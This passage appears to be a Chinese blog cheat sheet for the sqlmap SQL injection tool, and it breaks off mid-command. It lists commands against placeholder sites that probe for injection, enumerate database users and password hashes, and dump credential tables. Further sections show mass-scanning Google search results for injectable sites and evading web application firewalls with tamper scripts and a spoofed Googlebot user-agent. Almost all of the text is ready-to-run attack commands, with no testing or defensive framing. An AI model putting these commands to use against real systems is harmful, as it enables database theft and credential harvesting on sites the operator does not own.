这几日,研究了一些sqlmap工具的使用。通过视频,文章和-hh学到好多使用技巧。现在总结一下。文章会引用几位前辈的文章,觉得很好就直接拿过来用了。嘿嘿。。。
**sqlmap 常用命令
1../sqlmap.py -u "www.xxx.com/news.asp?id=1" //检查注入点
2.sqlmap -u "www.xxx.com/news.asp?id=1" --current-user //获取当前用户名
3.sqlmap -u "www.xxx.com/news.asp?id=1" --current-db //获取数据库名,得到库admin
4.sqlmap -u "www.xxx.com/news.asp?id=1" --privileges //权限判断
5.sqlmap -u "www.xxx.com/news.asp?id=1" --users //枚举管理系统用户
6.sqlmap -u "www.xxx.com/news.asp?id=1" --passwords //枚举管理系统用户哈希
7.sqlmap -u "www.xxx.com/news.asp?id=1" --tables -D "admin" //查admin库中的表名,得到user表
8.sqlmap -u "www.xxx.com/news.asp?id=1" --columns -T "user" -D "admin" -v 5 //查字段,v后数字越大越详细,得到id,username,password
9.sqlmap -u "www.xxx.com/news.asp?id=1" --dump -C "id,username,password" -T "user" -D "admin" -v 5 //拖库,或者使用--dump-all
10.--dbms "Mysql" //指定数据库类型
11.--dbs //列数据库
12.--passwords -U root //指定列数据库用户root的密码
13.--level 5 //执行测试的等级
14.--user-agent "Googlebot/2.1"
15.--tamper "space2morehash.py"
以上为常用sqlmap命令,其他的请查阅手册。
------------------------------------------------------------------------------------------------
**sqlmap 借助google批量扫注入点
1.sqlmap -g "site:target.com inurl:asp"
2.如果要查询注入选y,跳过选n
注:大部分查询结果不存在注入
------------------------------------------------------------------------------------------------
**sqlmap 利用编码绕过WAF
通过不同编码,绕过WAF
1.sqlmap -u "www.xxx.com/news.asp?id=1" --dbs --tamper "space2morehash.py" //利用.py脚本改变编码,除了space2hash.py,还有base64encode.py、charencode.py等等,可查/usr/share/sqlmap/tamper
2.sqlmap.py --proxy http://127.0.0.1:8087 -u "www.xx